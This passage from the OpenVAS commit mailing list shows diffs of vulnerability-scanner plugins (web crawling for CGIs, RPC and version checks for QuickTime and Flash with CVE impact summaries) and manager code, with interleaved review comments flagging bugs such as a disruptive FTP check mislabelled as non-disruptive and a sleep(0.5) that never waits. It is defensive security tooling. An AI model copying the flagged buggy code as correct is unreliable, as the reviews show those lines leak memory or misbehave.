make_list(); + +misc_report = ""; +cnt = 0; + +RootPasswordProtected = 0; + 
+guardian = 0; +coffeecup = 0; + +foreach URL (URLs) +{ + if(!URLs_hash[URL]) + { + page = retr(port:port, page:URL); + cnt ++; + pre_parse(src_page:URL, data:page); + parse_main(data:page, current:URL); + URLs_hash[URL] = 1; + if(cnt >= max_pages)break; + } +} + + +if(cnt == 1) +{ + if(RootPasswordProtected) + { + set_kb_item(name:string("www/", port, "/password_protected"), value:TRUE); + } +} +foreach URL (URLs) +{ + display(URL,"\n"); +} + +display("-----------------------------------------\n"); + + +report = ""; + +foreach foo (keys(CGIs)) +{ + args = CGIs[foo]; + if(!args) args = ""; + set_kb_item(name:string("www/", port, "/cgis"), value:string(foo, " - ", args)); + + + if(!report) + report = string("The following CGI have been discovered :\n\nSyntax : cginame (arguments [default value])\n\n", foo, " (", args, ")\n"); + else + report = string(report, foo, " (", args, ")\n"); +} + +if(misc_report) +{ + + report = string(report, "\n\n", misc_report); +} + + +if(guardian) +{ + report += string(" + +HTML Guardian is a tool which claims to encrypt web pages, whereas it simply +does a transposition of the content of the page. It is is no way a safe +way to make sure your HTML pages are protected. + +See also : http://www.securityfocus.com/archive/1/315950 +BID : 7169"); +} + + +if(coffeecup) +{ + report += " + +CoffeeCup Wizard is a tool which claims to encrypt links to web pages, +to force users to authenticate before they access the links. However, +the 'encryption' used is a simple transposition method which can be +decoded without the need of knowing a real username and password. 
+ +BID : 6995 7023"; +} + +if(strlen(report)) +{ + security_note(port:port, data:report); +} + Property changes on: trunk/openvas-plugins/scripts/webmirror.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl =================================================================== --- trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl 2009-10-02 17:48:14 UTC (rev 5358) @@ -50,7 +50,7 @@ exit(0); } -include("sunrpc_func.inc"); +include("misc_func.inc"); g_timeout = 15; # Must be greater than the maximum sleep value RPC_PROG = 100028; @@ -116,7 +116,7 @@ tcp_ports = get_kb_list('Services/RPC/ypupdated'); if (isnull(tcp_ports)) { - port = get_rpc_port2(program: RPC_PROG, protocol: IPPROTO_TCP); + port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_TCP); if (port) tcp_ports = make_list(port); } @@ -126,7 +126,7 @@ udp_ports = get_kb_list('Services/udp/RPC/ypupdated'); if (isnull(udp_ports)) { - port = get_rpc_port2(program: RPC_PROG, protocol: IPPROTO_UDP); + port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_UDP); if (port) udp_ports = make_list(port); } From scm-commit at wald.intevation.org Sat Oct 3 12:15:29 2009 
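Review bot: cerberus_ftp_server_36390.nasl declares script_category(ACT_GATHER_INFO), but the body sends oversized USER commands and raises security_warning when the server no longer answers, so it is a disruptive check and should be registered as ACT_DENIAL (or at least ACT_MIXED_ATTACK). As written, the only thing keeping it out of a non-disruptive scan is the safe_checks() test. Two smaller points in the same hunk: if any of the four open_sock_tcp() calls fails, the script exits without closing the sockets that did open, and the final check calls ftp_recv_line(socket: soc) without first testing soc, so "could not connect" and "connected but no banner" are reported identically. Testing soc explicitly would make the intent clear.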
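Review bot: get_unknown_svc() in misc_func.inc hard-codes if (port == 139) return 0; with no comment saying why that port is excluded, and the function has no header describing its contract (optional anonymous port argument, fallback to the "Services/unknown" KB item, returns the port or 0). Please add a short comment block above the function and a one-line reason next to the 139 test, since this is a shared include that other plugins will call.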
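Review bot: in photopost_detect.nasl, vers is set to string("unknown") and never updated, so the KB item www/<port>/photopost always stores "unknown under <dir>" and the report always prints PhotoPost Version 'unknown'. Either parse a version out of buf before set_kb_item(), or drop the version wording until that exists, so that dependent plugins do not key on a value that cannot change. Also, the loop calls exit(0) after the first match while the report text says "in the following directory(s)"; only one directory can ever be listed.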
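Review bot: in the sambar_cgi_path_disclosure.nasl hunk, the added line changes the DOCUMENT_ROOT pattern as well as adding the r && guard: the character class goes from [ \t]* on the removed line to [\t]* on the added one. Without the space in the class, a response of the form "DOCUMENT_ROOT: C:\" with a space after the colon no longer matches. If the intent was only to skip empty responses, keep the original class and add just the r && test.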
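Review bot: in the MAIN section of webmirror.nasl, dirs = get_kb_list(string("www/", port, "/content/directories")); runs before port = get_http_port(default:80);, so the KB key is built with an unset port and the directories found by the dependency are never picked up. Move the get_http_port() and get_port_state() lines above the get_kb_list() call. Other points in the same hunk: my_http_get(item, port) ignores its item argument and calls http_get(item:page, port:port), relying on a variable from the caller; canonical_url() ends one branch with remove_cgi_arguments(string("/", url)), passing the value positionally although the function reads the named argument url; add_url() tests num_url > 100 but nothing in the hunk increments num_url; and the foreach URL (URLs) display(...) loop near the end looks like leftover debug output that should sit behind the debug flag.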
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Sat, 3 Oct 2009 12:15:29 +0200 (CEST) Subject: [Openvas-commits] r5359 - in trunk/openvas-manager: . src src/tests Message-ID: <20091003101529.1316D85C72E5@pyrosoma.intevation.org> Author: mattm Date: 2009-10-03 12:15:27 +0200 (Sat, 03 Oct 2009) New Revision: 5359 Added: trunk/openvas-manager/src/tests/omp_get_preferences_2.c Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/otp.c trunk/openvas-manager/src/tests/CMakeLists.txt Log: When parsing the OTP PREFERENCES, read in all the preferences before enabling them, otherwise OMP GET_PREFERENCES might return a partial set of preferences. * src/otp.c (current_scanner_preferences): New variable. (make_scanner_preferences): Return preferences instead of setting scanner. (add_scanner_preference): Set preference on a given preference table instead of on scanner.preferences. Update caller. (process_otp_scanner_input): Initialise current_scanner_preferences with the make_scanner_preferences return. In SCANNER_PREFERENCE_NAME set scanner.preferences to current_scanner_preferences. * src/tests/omp_get_preferences_2.c: New file. Tests that first two successful returns from GET_PREFERENCES are identical. * src/tests/CMakeLists.txt: Add omp_get_preferences_2. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-02 17:48:14 UTC (rev 5358) +++ trunk/openvas-manager/ChangeLog 2009-10-03 10:15:27 UTC (rev 5359) 
@@ -1,3 +1,22 @@ +2009-09-30 Matthew Mundell + + When parsing the OTP PREFERENCES, read in all the preferences before + enabling them, otherwise OMP GET_PREFERENCES might return a partial + set of preferences. + + * src/otp.c (current_scanner_preferences): New variable. + (make_scanner_preferences): Return preferences instead of setting scanner. + (add_scanner_preference): Set preference on a given preference table + instead of on scanner.preferences. Update caller. + (process_otp_scanner_input): Initialise current_scanner_preferences + with the make_scanner_preferences return. In SCANNER_PREFERENCE_NAME set + scanner.preferences to current_scanner_preferences. + + * src/tests/omp_get_preferences_2.c: New file. Tests that first two + successful returns from GET_PREFERENCES are identical. + + * src/tests/CMakeLists.txt: Add omp_get_preferences_2. + 2009-09-30 Jan-Oliver Wagner Post-release version bump. Modified: trunk/openvas-manager/src/otp.c =================================================================== --- trunk/openvas-manager/src/otp.c 2009-10-02 17:48:14 UTC (rev 5358) +++ trunk/openvas-manager/src/otp.c 2009-10-03 10:15:27 UTC (rev 5359) @@ -35,6 +35,13 @@ * task records according to the OTP messages in the string. */ +/** + * @todo + * Ensure that the globals used to store information across the XML + * parser callbacks (for example, current_scanner_preferences) are freed in + * the failure cases. + */ + #include "otp.h" #include "manage.h" #include "tracef.h" 
@@ -411,16 +418,20 @@ static char* current_scanner_preference = NULL; /** + * @brief The current scanner preferences, during reading of scanner preferences. + */ +static GHashTable* current_scanner_preferences = NULL; + +/** * @brief Create the scanner preferences. */ -static void +static GHashTable* make_scanner_preferences () { - if (scanner.preferences) g_hash_table_destroy (scanner.preferences); - scanner.preferences = g_hash_table_new_full (g_str_hash, - g_str_equal, - g_free, - g_free); + return g_hash_table_new_full (g_str_hash, + g_str_equal, + g_free, + g_free); } /** @@ -433,9 +444,11 @@ * @param[in] value The value of the preference. */ static void -add_scanner_preference (/*@keep@*/ char* preference, /*@keep@*/ char* value) +add_scanner_preference (GHashTable* preferences, + /*@keep@*/ char* preference, + /*@keep@*/ char* value) { - g_hash_table_insert (scanner.preferences, preference, value); + g_hash_table_insert (preferences, preference, value); } @@ -1003,7 +1016,9 @@ { match[0] = '\0'; value = g_strdup (*messages); - add_scanner_preference (current_scanner_preference, value); + add_scanner_preference (current_scanner_preferences, + current_scanner_preference, + value); set_scanner_state (SCANNER_PREFERENCE_NAME); from_scanner_start += match + 1 - *messages; *messages = match + 1; @@ -2127,6 +2142,10 @@ if (sync_buffer ()) return -1; return 0; } + if (scanner.preferences) + g_hash_table_destroy (scanner.preferences); + scanner.preferences = current_scanner_preferences; + current_scanner_preferences = NULL; break; } { 
@@ -2196,7 +2215,8 @@ set_scanner_state (SCANNER_PORT_HOST); else if (strcasecmp ("PREFERENCES", field) == 0) { - make_scanner_preferences (); + assert (current_scanner_preference == NULL); + current_scanner_preferences = make_scanner_preferences (); set_scanner_state (SCANNER_PREFERENCE_NAME); } else if (strcasecmp ("RULES", field) == 0) Modified: trunk/openvas-manager/src/tests/CMakeLists.txt =================================================================== --- trunk/openvas-manager/src/tests/CMakeLists.txt 2009-10-02 17:48:14 UTC (rev 5358) +++ trunk/openvas-manager/src/tests/CMakeLists.txt 2009-10-03 10:15:27 UTC (rev 5359) @@ -410,6 +410,12 @@ target_link_libraries (omp_get_preferences_1 common) ADD_TEST (omp_get_preferences_1 omp_get_preferences_1) +add_executable (omp_get_preferences_2 omp_get_preferences_2.c) +set_target_properties (omp_get_preferences_2 PROPERTIES COMPILE_FLAGS "${GLIB_CFLAGS} ${OVAS_CFLAGS}") +set_target_properties (omp_get_preferences_2 PROPERTIES LINK_FLAGS "${OVAS_LDFLAG} ${GLIB_LDFLAGS}") +target_link_libraries (omp_get_preferences_2 common) +ADD_TEST (omp_get_preferences_2 omp_get_preferences_2) + add_executable (omp_get_report_0 omp_get_report_0.c) set_target_properties (omp_get_report_0 PROPERTIES COMPILE_FLAGS "${GLIB_CFLAGS} ${OVAS_CFLAGS}") set_target_properties (omp_get_report_0 PROPERTIES LINK_FLAGS "${OVAS_LDFLAG} ${GLIB_LDFLAGS}") Added: trunk/openvas-manager/src/tests/omp_get_preferences_2.c =================================================================== --- trunk/openvas-manager/src/tests/omp_get_preferences_2.c 2009-10-02 17:48:14 UTC (rev 5358) +++ trunk/openvas-manager/src/tests/omp_get_preferences_2.c 2009-10-03 10:15:27 UTC (rev 5359) 
@@ -0,0 +1,96 @@ +/* Test 1 of OMP GET_PREFERENCES. + * $Id$ + * Description: Test the OMP GET_PREFERENCES command. + * + * Authors: + * Matthew Mundell + * + * Copyright: + * Copyright (C) 2009 Greenbone Networks GmbH + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2, + * or, at your option, any later version as published by the Free + * Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. + */ + +#define TRACE 1 + +#include +#include +#include +#include +#include + +#include "common.h" +#include "../tracef.h" + +int +main () +{ + int socket; + gnutls_session_t session; + entity_t preferences_1, preferences_2; + + setup_test (); + + socket = connect_to_manager (&session); + if (socket == -1) return EXIT_FAILURE; + + if (omp_authenticate_env (&session)) + { + close_manager_connection (socket, session); + return EXIT_FAILURE; + } + + if (omp_get_preferences_503 (&session, &preferences_1)) + { + close_manager_connection (socket, session); + return EXIT_FAILURE; + } + + /* Get the preferences. */ + + if (openvas_server_send (&session, "") == -1) + { + free_entity (preferences_1); + close_manager_connection (socket, session); + return EXIT_FAILURE; + } + + /* Read the response. */ + + preferences_2 = NULL; + read_entity (&session, &preferences_2); + if (preferences_2) print_entity (stdout, preferences_2); + + /* Compare to expected response. 
*/ + + if (preferences_2 + && entity_attribute (preferences_2, "status") + && (strcmp (entity_attribute (preferences_2, "status"), "200") == 0) + && (strcmp (entity_attribute (preferences_2, "status_text"), "OK") == 0)) + { + if (compare_entities (preferences_1, preferences_2) == 0) + { + free_entity (preferences_1); + free_entity (preferences_2); + close_manager_connection (socket, session); + return EXIT_SUCCESS; + } + free_entity (preferences_1); + } + + if (preferences_2) free_entity (preferences_2); + close_manager_connection (socket, session); + return EXIT_FAILURE; +} From scm-commit at wald.intevation.org Sat Oct 3 12:36:55 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Sat, 3 Oct 2009 12:36:55 +0200 (CEST) Subject: [Openvas-commits] r5360 - in trunk/openvas-libraries: . omp Message-ID: <20091003103655.8497F861EADA@pyrosoma.intevation.org> Author: mattm Date: 2009-10-03 12:36:51 +0200 (Sat, 03 Oct 2009) New Revision: 5360 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/omp/omp.c trunk/openvas-libraries/omp/omp.h Log: * omp.c (omp_get_preferences_503): New function. * omp.h (omp_get_preferences_503): New header. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-03 10:15:27 UTC (rev 5359) +++ trunk/openvas-libraries/ChangeLog 2009-10-03 10:36:51 UTC (rev 5360) @@ -1,3 +1,8 @@ +2009-10-03 Matthew Mundell + + * omp.c (omp_get_preferences_503): New function. + * omp.h (omp_get_preferences_503): New header. + 2009-09-30 Matthew Mundell * nasl/openvas_logging.c (openvas_log_func): Pass the correct variable to Modified: trunk/openvas-libraries/omp/omp.c =================================================================== --- trunk/openvas-libraries/omp/omp.c 2009-10-03 10:15:27 UTC (rev 5359) +++ trunk/openvas-libraries/omp/omp.c 2009-10-03 10:36:51 UTC (rev 5360) 
@@ -989,6 +989,50 @@ } /** + * @brief Get the manager preferences, waiting for them to appear. + * + * @param[in] session Pointer to GNUTLS session. + * @param[out] response On success contains GET_PREFERENCES response. + * + * @return 0 on success, -1 or OMP response code on error. + */ +int +omp_get_preferences_503 (gnutls_session_t* session, entity_t* response) +{ + while (1) + { + const char* status; + + if (openvas_server_send (session, "")) + return -1; + + *response = NULL; + if (read_entity (session, response)) return -1; + + status = entity_attribute (*response, "status"); + if (status == NULL) + { + free_entity (*response); + return -1; + } + if (strlen (status) == 0) + { + free_entity (*response); + return -1; + } + char first = status[0]; + if (first == '2') return 0; + if (strlen (status) == 3 && strcmp (status, "503") == 0) + { + sleep (0.5); + continue; + } + free_entity (*response); + return -1; + } +} + +/** * @brief Get the manager certificates. * * @param[in] session Pointer to GNUTLS session. Modified: trunk/openvas-libraries/omp/omp.h =================================================================== --- trunk/openvas-libraries/omp/omp.h 2009-10-03 10:15:27 UTC (rev 5359) +++ trunk/openvas-libraries/omp/omp.h 2009-10-03 10:36:51 UTC (rev 5360) @@ -86,6 +86,9 @@ omp_get_preferences (gnutls_session_t*, entity_t*); int +omp_get_preferences_503 (gnutls_session_t*, entity_t*); + +int omp_get_certificates (gnutls_session_t*, entity_t*); int From scm-commit at wald.intevation.org Mon Oct 5 08:51:45 2009 
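Review bot: in the PREFERENCES branch of src/otp.c (hunk @@ -2196,7 +2215,8 @@ of r5359), the new `assert (current_scanner_preference == NULL);` checks the singular preference-name variable, while the next line overwrites the new plural `current_scanner_preferences`. If the intent is to catch a table left over from an earlier, interrupted PREFERENCES block, the check should be on `current_scanner_preferences` (or the old table should be destroyed before the assignment); as written, a leftover table is silently leaked, which is the failure case the @todo added at the top of the file describes.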
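Review bot: in src/tests/omp_get_preferences_2.c (r5359), `preferences_1` is freed only inside the branch where the second response has status 200, so when `read_entity` yields no entity or the status is not 200 the test returns EXIT_FAILURE with `preferences_1` still allocated; free it on the common failure path next to `if (preferences_2) free_entity (preferences_2);`. In the same comparison, `entity_attribute (preferences_2, "status_text")` is passed to strcmp without the NULL check that the "status" attribute gets, and the header comment still says "Test 1 of OMP GET_PREFERENCES" although this is the _2 test.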
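Review bot: in omp_get_preferences_503 (omp/omp.c, r5360), `sleep (0.5)` does not wait half a second: sleep() takes an unsigned int number of seconds, so 0.5 is converted to 0 and the 503 branch re-sends the request immediately, in a tight loop against a manager that has just said it is not ready. Use a sub-second call such as usleep, nanosleep or g_usleep, or sleep for a whole second. The same branch reaches `continue` without `free_entity (*response)`, so every 503 reply is leaked when `*response = NULL` is assigned on the next iteration, and the loop has no retry limit, so a manager that keeps answering 503 holds the caller here indefinitely.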
From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 08:51:45 +0200 (CEST) Subject: [Openvas-commits] r5361 - in trunk/openvas-plugins: . scripts Message-ID: <20091005065145.56E5D861EABA@pyrosoma.intevation.org> Author: chandra Date: 2009-10-05 08:51:33 +0200 (Mon, 05 Oct 2009) New Revision: 5361 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/smbcl_CVE-2008-0234.nasl trunk/openvas-plugins/scripts/smbcl_flash_player_CB-A08-0059.nasl trunk/openvas-plugins/scripts/smbcl_gnutls_CB-A08-0079.nasl trunk/openvas-plugins/scripts/smbcl_mozilla.nasl trunk/openvas-plugins/scripts/smbcl_openoffice_CB-A08-0068.nasl trunk/openvas-plugins/scripts/win_CVE-2007-0043.nasl trunk/openvas-plugins/scripts/win_CVE-2007-6026.nasl trunk/openvas-plugins/scripts/win_CVE-2008-0080.nasl trunk/openvas-plugins/scripts/win_CVE-2008-0087.nasl Log: Removed dependency on smbclient Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/ChangeLog 2009-10-05 06:51:33 UTC (rev 5361) 
@@ -1,3 +1,17 @@ +2009-10-05 Chandrashekhar B + + * scripts/win_CVE-2008-0080.nasl, + scripts/smbcl_CVE-2008-0234.nasl, + scripts/win_CVE-2007-0043.nasl, + scripts/smbcl_flash_player_CB-A08-0059.nasl, + scripts/smbcl_gnutls_CB-A08-0079.nasl, + scripts/win_CVE-2008-0087.nasl, + scripts/smbcl_openoffice_CB-A08-0068.nasl, + scripts/smbcl_mozilla.nasl, + scripts/win_CVE-2007-6026.nasl: + Re-written as per smb_nt.inc method, to remove dependency on Samba + based smbclient. + 2009-10-02 Michael Meyer * scripts/photopost_detect.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/cve_current.txt 2009-10-05 06:51:33 UTC (rev 5361) @@ -102,3 +102,12 @@ CVE-2009-3125 Greenbone svn R 36390 Greenbone svn R CVE-2009-3165 Greenbone svn R +CVE-2009-3523 SecPod +CVE-2009-3522 SecPod +CVE-2009-3524 SecPod +CVE-2009-3518 SecPod +CVE-2009-3510 SecPod +CVE-2009-3541 SecPod +CVE-2009-3484 SecPod + + Modified: trunk/openvas-plugins/scripts/smbcl_CVE-2008-0234.nasl =================================================================== --- trunk/openvas-plugins/scripts/smbcl_CVE-2008-0234.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/smbcl_CVE-2008-0234.nasl 2009-10-05 06:51:33 UTC (rev 5361) 
@@ -1,95 +1,74 @@ +############################################################################# # +# +# # This script was written by Carsten Koch-Mauthe # # This script is released under the GNU GPLv2 # # $Revision: 02 $ +# +# Updated By: +# Antu Sanadi on 16/09/2009 +# +# +############################################################################## if(description) { - script_id(90012); - script_version ("$Revision: 02 $"); - script_cve_id("CVE-2008-2010"); - name = "Buffer overflow in Apple Quicktime Player"; - script_name(name); + script_id(90012); + script_version ("$Revision: 02$"); + script_cve_id("CVE-2008-2010"); + script_name("Buffer overflow in Apple Quicktime Player"); + desc = "The remote host is probable affected by the vulnerabilitys described in + CVE-2008-0234 CVE-2008-2010 - desc = "The remote host is probable affected by the vulnerabilitys described in -CVE-2008-0234 CVE-2008-2010 + Impact + Buffer overflow in Apple Quicktime Player 7.3.1.70 + and other versions before 7.4.1, when RTSP tunneling + is enabled, allows remote attackers to execute + arbitrary code via a long Reason-Phrase response + to an rtsp:// request, as demonstrated using a + 404 error message. -Checking if QuickTime version is less than 7.5 + Unspecified vulnerability in Apple QuickTime Player + on Windows XP SP2 and Vista SP1 allows remote attackers + to execute arbitrary code via a crafted QuickTime media + file. NOTE: as of 20080429, the only disclosure is a + vague pre-advisory with no actionable information. + However, because it is from a well-known researcher, + it is being assigned a CVE identifier for tracking purposes. -Impact - Buffer overflow in Apple Quicktime Player 7.3.1.70 - and other versions before 7.4.1, when RTSP tunneling - is enabled, allows remote attackers to execute - arbitrary code via a long Reason-Phrase response - to an rtsp:// request, as demonstrated using a - 404 error message. 
- - Unspecified vulnerability in Apple QuickTime Player - on Windows XP SP2 and Vista SP1 allows remote attackers - to execute arbitrary code via a crafted QuickTime media - file. NOTE: as of 20080429, the only disclosure is a - vague pre-advisory with no actionable information. - However, because it is from a well-known researcher, - it is being assigned a CVE identifier for tracking purposes. - -References: + References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0234 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2010 http://lists.apple.com/archives/security-announce/2008/Feb/msg00001.html http://lists.apple.com/archives/Security-announce/2008/Jun/msg00000.html -Solution: + + Solution: All Users should upgrade to the latest version. + Risk factor : High"; -Risk factor : High"; - script_description(desc); - summary = "Test for Buffer overflow in Apple Quicktime Player"; - script_summary(summary); + script_summary("Check the version of Apple Quicktime Player"); script_category(ACT_GATHER_INFO); script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); + script_family("Buffer overflow"); + script_dependencies("secpod_apple_quicktime_detection_win_900124.nasl"); exit(0); } -# -# The code starts here -# include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); - test_version = "7.50.51"; - win_dir = get_windir(); - if( !isnull(win_dir) ) { - test_file[0] = win_dir+"System32\QuickTime.qts"; - test_file[1] = "Programme\QuickTime\QuickTimePlayer.exe"; - test_file[2] = "Program Files\QuickTime\QuickTimePlayer.exe"; - foreach filespec (test_file) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, 
test_version: test_version) ) { - security_hole(port:0, proto:"Win_Quicktime"); - report = report + "Fileversion : C$ "+filespec + " "+v+string("\n"); - security_hole(port:0, proto:"Win_Quicktime", data:report); - } - break; - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"Win_Quicktime", data:report); - } - } - } +qtVer = get_kb_item("QuickTime/Win/Ver"); +if(qtVer) +{ + # QuickTime version < 7.50.51 + if(version_is_less(version:qtVer, test_version:"7.50.51")){ + security_hole(0); } - -exit(0); +} Modified: trunk/openvas-plugins/scripts/smbcl_flash_player_CB-A08-0059.nasl =================================================================== --- trunk/openvas-plugins/scripts/smbcl_flash_player_CB-A08-0059.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/smbcl_flash_player_CB-A08-0059.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,3 +1,4 @@ +################################################################################## # # This script was written by Carsten Koch-Mauthe # 
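Review bot: the rewritten scripts/smbcl_CVE-2008-0234.nasl reads `get_kb_item("QuickTime/Win/Ver")` but declares only script_dependencies, with no `script_require_keys("QuickTime/Win/Ver")`, so the plugin is scheduled even when the detection script found no QuickTime; add the key requirement. The new `security_hole(0)` also drops the report data the old code passed (file path and detected version), which leaves the finding without evidence of what was matched; passing the version from the KB as `data` would keep that. Separately, `script_family` changes from "Windows" to "Buffer overflow" and `$Revision: 02$` loses the space before the closing `$`, neither of which is covered by the log message "Removed dependency on smbclient".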
@@ -3,115 +4,114 @@ # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Modified to Implement based on 'smb_nt.inc' +# - By Sharath S On 2009-09-14 +# +############################################################################### if(description) { + script_id(90019); + script_version ("$Revision: 03 $"); + script_cve_id("CVE-2007-5275", "CVE-2007-6019", "CVE-2007-6243", + "CVE-2007-6637", "CVE-2008-1654", "CVE-2008-1655"); + script_bugtraq_id(26930, 28694, 26966, 27034, 28696, 28697); + script_name("Adobe Flash Player 9.0.115.0 and earlier vulnerability (Win)"); + desc = " + The remote host is probably affected by the vulnerabilities described in + CVE-2007-5275, CVE-2007-6019, CVE-2007-6243, CVE-2007-6637, CVE-2008-1654, + CVE-2008-1655. - script_id(90019); - script_version ("$Revision: 01 $"); - name = "Adobe Flash Player 9.0.115.0 and earlier vulnerability (Win)"; - script_name(name); + Impact: + - CVE 2007-5275 + The Adobe Macromedia Flash 9 plug-in allows remote attackers to cause a + victim machine to establish TCP sessions with arbitrary hosts via a Flash + (SWF) movie, related to lack of pinning of a hostname to a single IP address + after receiving an allow-access-from element in a cross-domain-policy XML + document, and the availability of a Flash Socket class that does not use + the browser's DNS pins, aka DNS rebinding attacks, a different issue than + CVE-2002-1467 and CVE-2007-4324. + - CVE 2007-6019 + Adobe Flash Player 9.0.115.0 and earlier, and 8.0.39.0 and earlier, allows + remote attackers to execute arbitrary code via an SWF file with a modified + DeclareFunction2 Actionscript tag, which prevents an object from being + instantiated properly. 
+ - CVE 2007-6243 + Adobe Flash Player 9.x up to 9.0.48.0, 8.x up to 8.0.35.0, and 7.x up to + 7.0.70.0 does not sufficiently restrict the interpretation and usage of + cross-domain policy files, which makes it easier for remote attackers to + conduct cross-domain and cross-site scripting (XSS) attacks. + - CVE 2007-6637 + Multiple cross-site scripting (XSS) vulnerabilities in Adobe Flash Player + allow remote attackers to inject arbitrary web script or HTML via a crafted + SWF file, related to 'pre-generated SWF files' and Adobe Dreamweaver CS3 or + Adobe Acrobat Connect. NOTE: the asfunction: vector is already covered by + CVE-2007-6244.1. + - CVE 2008-1654 + Interaction error between Adobe Flash and multiple Universal Plug and Play + (UPnP) services allow remote attackers to perform Cross-Site Request Forgery + (CSRF) style attacks by using the Flash navigateToURL function to send a SOAP + message to a UPnP control point, as demonstrated by changing the primary DNS + server. + - CVE 2008-1655 + Unspecified vulnerability in Adobe Flash Player 9.0.115.0 and earlier, and + 8.0.39.0 and earlier, makes it easier for remote attackers to conduct DNS + rebinding attacks via unknown vectors. 
- desc = "The remote host is probably affected by the vulnerabilities described in -CVE-2007-5275, CVE-2007-6019, CVE-2007-6243, CVE-2007-6637, CVE-2008-1654, CVE-2008-1655 + References: + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5275 + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6019 + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6243 + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6637 + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1654 + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1655 -Impact - CVE 2007-5275 - The Adobe Macromedia Flash 9 plug-in allows remote attackers to cause - a victim machine to establish TCP sessions with arbitrary hosts via a - Flash (SWF) movie, related to lack of pinning of a hostname to a single - IP address after receiving an allow-access-from element in a - cross-domain-policy XML document, and the availability of a Flash Socket - class that does not use the browser's DNS pins, aka DNS rebinding attacks, - a different issue than CVE-2002-1467 and CVE-2007-4324. - CVE 2007-6019 - Adobe Flash Player 9.0.115.0 and earlier, and 8.0.39.0 and earlier, - allows remote attackers to execute arbitrary code via an SWF file with - a modified DeclareFunction2 Actionscript tag, which prevents an object - from being instantiated properly. - CVE 2007-6243 - Adobe Flash Player 9.x up to 9.0.48.0, 8.x up to 8.0.35.0, and 7.x - up to 7.0.70.0 does not sufficiently restrict the interpretation and - usage of cross-domain policy files, which makes it easier for remote - attackers to conduct cross-domain and cross-site scripting (XSS) attacks. - CVE 2007-6637 - Multiple cross-site scripting (XSS) vulnerabilities in Adobe Flash - Player allow remote attackers to inject arbitrary web script or HTML - via a crafted SWF file, related to 'pre-generated SWF files' and Adobe - Dreamweaver CS3 or Adobe Acrobat Connect. 
NOTE: the asfunction: vector - is already covered by CVE-2007-6244.1. - CVE 2008-1654 - Interaction error between Adobe Flash and multiple Universal Plug and Play - (UPnP) services allow remote attackers to perform Cross-Site Request - Forgery (CSRF) style attacks by using the Flash navigateToURL function - to send a SOAP message to a UPnP control point, as demonstrated by changing - the primary DNS server. - CVE 2008-1655 - Unspecified vulnerability in Adobe Flash Player 9.0.115.0 and earlier, - and 8.0.39.0 and earlier, makes it easier for remote attackers to - conduct DNS rebinding attacks via unknown vectors. + Solution: + All Adobe Flash Player users should upgrade to the latest version: + http://get.adobe.com/flashplayer/ + Risk factor : High"; -References: - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5275 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6019 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6243 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6637 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1654 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1655 + script_description(desc); + script_summary("Determine the version of Flashplayer"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("Windows"); + script_dependencies("secpod_reg_enum.nasl"); + 